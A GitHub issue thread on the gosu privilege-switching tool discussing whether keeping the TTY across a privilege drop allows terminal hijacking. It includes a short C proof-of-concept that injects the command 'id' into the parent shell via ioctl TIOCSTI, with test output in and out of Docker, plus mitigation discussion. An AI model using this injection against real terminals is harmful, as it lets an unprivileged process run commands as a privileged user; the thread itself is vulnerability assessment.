-
Notifications
You must be signed in to change notification settings - Fork 320
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Keeping the TTY across a privilege boundary might be insecure #37
Comments
Also relevant (quote from the link above):
You should ensure that all the file descriptors are closed (except maybe STDIN / STDOUT / STDERR? I don't know, this is not my area of expertise). |
Keeping file descriptors across the boundary was also considered a feature. 😞 Is there any good information about a simple way to exploit so we can more easily test the level to which we're affected and whether there are mitigations we can recommend with or without changes to |
As I said: Not my area of expertise. Possibly the use for PID 1 in a container is absolutely fine, while other uses are not. I recommend asking on that mailing list. Use the following headers for proper threading (I can send you the
|
I just noticed that there are further replies to that mailing list thread, including a link to Busybox' bug tracker, with an example program: http://www.openwall.com/lists/oss-security/2017/06/04/2 |
Nice, thanks for the link! I've tried the program there, and The catch is that the exploit provided there only works if Edit: adding the contents of the C source for posterity's sake: #include <unistd.h>
#include <sys/ioctl.h>
#include <stdio.h>
int main()
{
for (char *cmd = "id\n"; *cmd; cmd++) {
if (ioctl(STDIN_FILENO, TIOCSTI, cmd)) {
fprintf(stderr, "++ ioctl failed: %m\n");
return 1;
}
}
return 0;
} |
Consider preventing running gosu from an interactive shell then. If it can be misused it will be misused, especially since it's part of the Debian repositories starting with Stretch. |
How do we detect it being used from within an interactive shell? Just detecting a TTY won't be enough, since a TTY is generated for non-interactive cases too (such as |
What if gosu is used to launch a TTY? Say, at the end of a Dockerfile: (Great work on gosu btw) |
Since the shell spawning that container is completely isolated from the Docker container, it should be isolated from this exploit, but I'm going to go verify that now to be sure. If it is, then Docker itself should be also (with or without |
Ok, I put the C source into a file called $ docker run -it --rm -v "$PWD":/src -w /src -u "$(id -u):$(id -g)" gcc gcc -o boom -static ./source.c (so now I've got an executable named Running that file directly in my current terminal exhibits the vuln: $ ./boom
id
$ id
uid=1000(tianon) gid=1000(tianon) groups=1000(tianon),... Running that in a container: $ docker run -it --rm -v "$PWD":/cwd:ro alpine /cwd/boom
id (no additional And with $ docker run -it --rm -v "$PWD":/cwd:ro alpine /cwd/gosu nobody /cwd/boom
id |
And when your docker process dies the id will be typed into the shell I suspect. Even if you say 'but it'll never die' what about forced out of memory ? For other fun try things changing the terminal speed, video mode settings etc or reloading the keymap if it's run on a console. The only case it's safe not to allocate a pty/tty pair is if you know you are going from low to high privilege. Even then you need to be careful about how much trust you have in the caller. If docker is allocating a pty/tty pair then you may be safe - or at least you can only harm the inside of the container but as a general purpose utility it's a bit of a hazard. |
@EtchedPixels except that the interactive terminal we (the user) are attached to is never passed to the container -- when we do |
Which means its safe for that explicit use case - but not generically. |
Not sure I understand fully what you're getting at -- that's the target use case of |
I'm agreeing it works for the target case. But it doesn't work if people go off and use if for other things. Not saying that's bad, and it's documented here now. For your intended purpose it looks good to me. (and I ended up reading this and the code because someone was planning to use it in a different context) |
May I recommend at least explicitly specifying that is the only intended use case, and at a minimal warn that it could be a vulnerability used otherwise? I see gosu used in a lot of things that aren't contained in a container. Or maybe even go as far as to make it so gosu will only work if it is spawned by PID 1? |
Good point, note to the |
(I'd be very interested in hearing more about places folks are using |
I use gosu in my entrypoint script like below.
As you can see at the end of my entrypoint script I have revoked the permission from gosu. Is it safe now ? |
I'll reiterate that |
See: - https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=tiocsti - tianon/gosu#37 - Why `su` has `--pty` option
`man bwrap` > Create a new terminal session for the sandbox (calls setsid()). https://www.openwall.com/lists/oss-security/2017/06/03/9 ncopa/su-exec#23 tianon/gosu#37 https://ruderich.org/simon/notes/su-sudo-from-root-tty-hijacking Relates-to: #2
Coming back to this, https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=83efeeeb3d04b22aaed1df99bc70a48fe9d22c4d is useful -- setting |
As per IRC:
<+TimWolla> tianon, you might want to check whether this applies to gosu: http://www.openwall.com/lists/oss-security/2017/06/03/9
<+TimWolla> Should I create an issue?
<@tianon> TimWolla: hrm, that's troubling -- we intentionally don't touch anything TTY related (that's one of the main features over "su" or "sudo") :(
<@tianon> TimWolla: an issue would probably be great for discussing / figuring out whether there's impact to gosu and whether there's something we should fix or document about it :)
The text was updated successfully, but these errors were encountered: